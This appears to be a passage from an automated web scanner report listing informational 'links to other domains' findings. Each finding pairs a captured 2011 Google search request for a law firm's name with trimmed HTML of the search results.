GET /search?q=Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:08:43 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 78970

<!doctype html> <head> <title>Howard Rice Nemerovski Canady Falk &amp; Rabkin - Google Search</title> <script>window.google={kEI:"CwbMTe-gE8Tj0gGh2YndBg",kEXPI:"17259,23756,24692,24878,24879,27
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.howardrice.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:qeIs2LVnv0oJ:www.howardrice.com/+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:qeIs2LVnv0oJ:www.howardrice.com/+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.howardrice.com/Howard-Rice-People" onmousedown="return clk(this.href,'','','','1','','0CB0QqwMoADAA')">People</a></div><div class=sld><a class=sla href="http://www.howardrice.com/6094" onmousedown="return clk(this.href,'','','','1','','0CB4QqwMoATAA')">Our Firm</a></div><div class=sld><a class=sla href="http://www.howardrice.com/Law-Students" onmousedown="return clk(this.href,'','','','1','','0CB8QqwMoAjAA')">Law Students</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.howardrice.com/6880" onmousedown="return clk(this.href,'','','','1','','0CCAQqwMoAzAA')">Firm Leadership</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.howardrice.com/Contact-Us" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoBDAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.howardrice.com/Events" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoBTAA')">Events</a></div><div class=sld><a class=sla href="http://www.howardrice.com/Locations--Directions" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoBjAA')">Location &amp; Directions</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.howardrice.com/News--Publications" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoBzAA')">News &amp; Publications</a>
...[SNIP]...
<h3 class="r"><a href="http://www.howardrice.com/Howard-Rice-People" class=l onmousedown="return clk(this.href,'','','','3','','0CDAQFjAC')">People - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:wV3A5Ch4SfAJ:www.howardrice.com/Howard-Rice-People+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:wV3A5Ch4SfAJ:www.howardrice.com/Howard-Rice-People+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CDUQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.howardrice.com/Events" class=l onmousedown="return clk(this.href,'','','','4','','0CDYQFjAD')">Events - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:7b-XxkK8Hb8J:www.howardrice.com/Events+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:7b-XxkK8Hb8J:www.howardrice.com/Events+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CDsQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.crunchbase.com/service-provider/howard-rice-nemerovski-canady-falk-rabkin" class=l onmousedown="return clk(this.href,'','','','5','','0CD0QFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:w4VA94dkZ7UJ:www.crunchbase.com/service-provider/howard-rice-nemerovski-canady-falk-rabkin+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:w4VA94dkZ7UJ:www.crunchbase.com/service-provider/howard-rice-nemerovski-canady-falk-rabkin+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CEQQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.iln.com/Firm_Detail_38.htm" class=l onmousedown="return clk(this.href,'','','','6','','0CEUQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:A9osf5TFPcoJ:www.iln.com/Firm_Detail_38.htm+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:A9osf5TFPcoJ:www.iln.com/Firm_Detail_38.htm+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CEoQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jdjournal.com/2009/08/21/howard-rice-cancels-2010-summer-program/" class=l onmousedown="return clk(this.href,'','','','7','','0CEwQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:tnm1tT7MOOgJ:www.jdjournal.com/2009/08/21/howard-rice-cancels-2010-summer-program/+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:tnm1tT7MOOgJ:www.jdjournal.com/2009/08/21/howard-rice-cancels-2010-summer-program/+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CFEQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/california-northern/lawfirm/Howard-Rice-Nemerovski-Canady-Falk-and-Rabkin-PC/feece60f-b4ac-43f5-94dc-0f87e4b8b613.html" class=l onmousedown="return clk(this.href,'','','','8','','0CFMQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:q9I6ZpJbkdUJ:www.superlawyers.com/california-northern/lawfirm/Howard-Rice-Nemerovski-Canady-Falk-and-Rabkin-PC/feece60f-b4ac-43f5-94dc-0f87e4b8b613.html+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:q9I6ZpJbkdUJ:www.superlawyers.com/california-northern/lawfirm/Howard-Rice-Nemerovski-Canady-Falk-and-Rabkin-PC/feece60f-b4ac-43f5-94dc-0f87e4b8b613.html+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CFgQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.glassdoor.com/Reviews/Howard-Rice-Nemerovski-Canady-Falk-and-Rabkin-Reviews-E26890.htm" class=l onmousedown="return clk(this.href,'','','','9','','0CFoQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:BcS0F7AiFo8J:www.glassdoor.com/Reviews/Howard-Rice-Nemerovski-Canady-Falk-and-Rabkin-Reviews-E26890.htm+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:BcS0F7AiFo8J:www.glassdoor.com/Reviews/Howard-Rice-Nemerovski-Canady-Falk-and-Rabkin-Reviews-E26890.htm+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CF8QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Howard-Rice-Nemerovski-Canady/232384-law-firm-office.htm" class=l onmousedown="return clk(this.href,'','','','10','','0CGEQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:RfCmLl3_-KsJ:www.martindale.com/Howard-Rice-Nemerovski-Canady/232384-law-firm-office.htm+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:RfCmLl3_-KsJ:www.martindale.com/Howard-Rice-Nemerovski-Canady/232384-law-firm-office.htm+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CGYQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=2384444" class=l onmousedown="return clk(this.href,'','','','11','','0CGgQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:DOX0VIoVKokJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D2384444+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:DOX0VIoVKokJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D2384444+Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','11','','0CG0QIDAK')">Cached</a>
...[SNIP]...
<div><a href="http://www.irell.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CG8QoggwCw')">Irell & Manella LLP</a>
...[SNIP]...
<div><a href="http://www.orrick.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHEQoggwDA')">Orrick</a>
...[SNIP]...
<div><a href="http://www.hansonbridgett.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHMQoggwDQ')">Hanson Bridgett</a>
...[SNIP]...
<div><a href="http://www.jmbm.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CHUQoggwDg')">Jeffer Mangels Butler & Mitchell LLP</a>
...[SNIP]...
24.25. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Tydings+%26+Rosenberg&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:01:59 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 74153

<!doctype html> <head> <title>Tydings &amp; Rosenberg - Google Search</title> <script>window.google={kEI:"dwTMTYHkM-rm0QHK1uThBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Tydings+%26+Rosenberg&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tydingslaw.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBkQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:tm3CsGSVlUMJ:www.tydingslaw.com/+Tydings+%26+Rosenberg&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:tm3CsGSVlUMJ:www.tydingslaw.com/+Tydings+%26+Rosenberg&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CB4QIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tydingslaw.com/Content.aspx?topic=BENCHMARK%20LITIGATION%202011%20RECOGNIZES_TYDINGS_ROSENBERG_LLP_AS_TOP_LITIGATION_FIRM" class=l onmousedown="return clk('http://www.tydingslaw.com/Content.aspx?topic=BENCHMARK%20LITIGATION%202011%20RECOGNIZES_TYDINGS_ROSENBERG_LLP_AS_TOP_LITIGATION_FIRM','','','','3','','0CCgQFjAC')">BENCHMARK LITIGATION 2011 RECOGNIZES <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jh6zVszD8u4J:www.tydingslaw.com/Content.aspx%3Ftopic%3DBENCHMARK%2520LITIGATION%25202011%2520RECOGNIZES_TYDINGS_ROSENBERG_LLP_AS_TOP_LITIGATION_FIRM+Tydings+%26+Rosenberg&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:jh6zVszD8u4J:www.tydingslaw.com/Content.aspx%3Ftopic%3DBENCHMARK%2520LITIGATION%25202011%2520RECOGNIZES_TYDINGS_ROSENBERG_LLP_AS_TOP_LITIGATION_FIRM+Tydings+%26+Rosenberg&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CC0QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/private/snapshot.asp?privcapId=11316530" class=l onmousedown="return clk(this.href,'','','','4','','0CDAQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Mge5-Dae-zkJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D11316530+Tydings+%26+Rosenberg&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Mge5-Dae-zkJ:investing.businessweek.com/research/stocks/private/snapshot.asp%3FprivcapId%3D11316530+Tydings+%26+Rosenberg&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CDUQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/tydings-&amp;-rosenberg-llp" class=l onmousedown="return clk(this.href,'','','','5','','0CDYQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nr8Vmr3SSn0J:www.linkedin.com/company/tydings-%26-rosenberg-llp+Tydings+%26+Rosenberg&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:nr8Vmr3SSn0J:www.linkedin.com/company/tydings-%26-rosenberg-llp+Tydings+%26+Rosenberg&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CDsQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://baltimore.citybizlist.com/1/2011/3/14/Tydings--Rosenberg-Congratulates-Ferrier-R.-Stillman-and-Maria-Ellena-ChavezRuark-on-Being-Named-to-Maryland%E2%80%99s-Top-100-Women-in-2011.aspx" class=l onmousedown="return clk('http://baltimore.citybizlist.com/1/2011/3/14/Tydings--Rosenberg-Congratulates-Ferrier-R.-Stillman-and-Maria-Ellena-ChavezRuark-on-Being-Named-to-Maryland%E2%80%99s-Top-100-Women-in-2011.aspx','','','','6','','0CDwQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:cp6boL8hVH0J:baltimore.citybizlist.com/1/2011/3/14/Tydings--Rosenberg-Congratulates-Ferrier-R.-Stillman-and-Maria-Ellena-ChavezRuark-on-Being-Named-to-Maryland%E2%80%99s-Top-100-Women-in-2011.aspx+Tydings+%26+Rosenberg&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:cp6boL8hVH0J:baltimore.citybizlist.com/1/2011/3/14/Tydings--Rosenberg-Congratulates-Ferrier-R.-Stillman-and-Maria-Ellena-ChavezRuark-on-Being-Named-to-Maryland%E2%80%99s-Top-100-Women-in-2011.aspx+Tydings+%26+Rosenberg&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CEEQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/maryland/lawfirm/Tydings-and-Rosenberg-LLP/8f6d6437-1e74-4c71-bf75-cbabd2e32b8a.html" class=l onmousedown="return clk(this.href,'','','','7','','0CEIQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rrufFmCq9MgJ:www.superlawyers.com/maryland/lawfirm/Tydings-and-Rosenberg-LLP/8f6d6437-1e74-4c71-bf75-cbabd2e32b8a.html+Tydings+%26+Rosenberg&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:rrufFmCq9MgJ:www.superlawyers.com/maryland/lawfirm/Tydings-and-Rosenberg-LLP/8f6d6437-1e74-4c71-bf75-cbabd2e32b8a.html+Tydings+%26+Rosenberg&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CEcQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://bestlawfirms.usnews.com/firms/tydings-rosenberg-llp/overview/35188/" class=l onmousedown="return clk(this.href,'','','','8','','0CEoQFjAH')">U.S. News - Best Lawyers - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:BOsuYuqJdicJ:bestlawfirms.usnews.com/firms/tydings-rosenberg-llp/overview/35188/+Tydings+%26+Rosenberg&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:BOsuYuqJdicJ:bestlawfirms.usnews.com/firms/tydings-rosenberg-llp/overview/35188/+Tydings+%26+Rosenberg&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CE8QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://pview.findlaw.com/view/2491299_1" class=l onmousedown="return clk(this.href,'','','','9','','0CFAQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9yqt6gdLJRUJ:pview.findlaw.com/view/2491299_1+Tydings+%26+Rosenberg&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:9yqt6gdLJRUJ:pview.findlaw.com/view/2491299_1+Tydings+%26+Rosenberg&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CFUQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://twitter.com/tydingslaw" class=l onmousedown="return clk(this.href,'','','','10','','0CFYQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Y0y3R2bEp9cJ:twitter.com/tydingslaw+Tydings+%26+Rosenberg&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Y0y3R2bEp9cJ:twitter.com/tydingslaw+Tydings+%26+Rosenberg&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CFsQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.indeed.com/forum/cmp/Tydings-%26-Rosenberg-LLP.html" class=l onmousedown="return clk('http://www.indeed.com/forum/cmp/Tydings-%26-Rosenberg-LLP.html','','','','11','','0CFwQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AR-SIp0Ri_sJ:www.indeed.com/forum/cmp/Tydings-%2526-Rosenberg-LLP.html+Tydings+%26+Rosenberg&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:AR-SIp0Ri_sJ:www.indeed.com/forum/cmp/Tydings-%2526-Rosenberg-LLP.html+Tydings+%26+Rosenberg&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','11','','0CGQQIDAK')">Cached</a>
...[SNIP]...
24.26. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Jackson+DeMarco+Tidus+Peckenpaugh&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:08:37 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 72535

<!doctype html> <head> <title>Jackson DeMarco Tidus Peckenpaugh - Google Search</title> <script>window.google={kEI:"BQbMTdrULeWV0QHL1O36Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,2850
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Jackson+DeMarco+Tidus+Peckenpaugh&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jdtplaw.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:5YegIcjgLcYJ:www.jdtplaw.com/+Jackson+DeMarco+Tidus+Peckenpaugh&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.jdtplaw.com/CM/Professionals/Attorneys.asp" onmousedown="return clk(this.href,'','','','1','','0CB0QqwMoADAA')">Attorneys</a></div><div class=sld><a class=sla href="http://www.jdtplaw.com/CM/Custom/TOCOffices.asp" onmousedown="return clk(this.href,'','','','1','','0CB4QqwMoATAA')">Offices</a></div><div class=sld><a class=sla href="http://www.jdtplaw.com/CM/Custom/TOCPracticeAreaDescriptions.asp" onmousedown="return clk(this.href,'','','','1','','0CB8QqwMoAjAA')">Practice Groups</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.jdtplaw.com/CM/Custom/Contact.asp" onmousedown="return clk(this.href,'','','','1','','0CCAQqwMoAzAA')">Contact</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.jdtplaw.com/CM/Custom/TOCProfessionals.asp" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoBDAA')">Professionals</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.jdtplaw.com/PracticeAreas/Litigation-Environmental-Land-Use-Municipal.asp" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoBTAA')">Environmental</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.jdtplaw.com/PracticeAreas/Litigation-Commercial-IP-Employment-Financing.asp" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoBjAA')">Litigation</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.jdtplaw.com/CM/NewsResources/TOCPublications.asp" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoBzAA')">Articles</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jdtplaw.com/CM/Professionals/Attorneys.asp" class=l onmousedown="return clk(this.href,'','','','2','','0CCcQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:3sjOlC7lrqQJ:www.jdtplaw.com/CM/Professionals/Attorneys.asp+Jackson+DeMarco+Tidus+Peckenpaugh&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCwQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jdtplaw.com/CM/Custom/TOCOffices.asp" class=l onmousedown="return clk(this.href,'','','','3','','0CC4QFjAC')">Offices - Law Firm <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jQvDPzX9fM4J:www.jdtplaw.com/CM/Custom/TOCOffices.asp+Jackson+DeMarco+Tidus+Peckenpaugh&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDMQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jdtplaw.com/CM/Custom/Contact.asp" class=l onmousedown="return clk(this.href,'','','','4','','0CDUQFjAD')">Contact JDTP | Orange County Attorneys | Irvine California <b>
...[SNIP]...
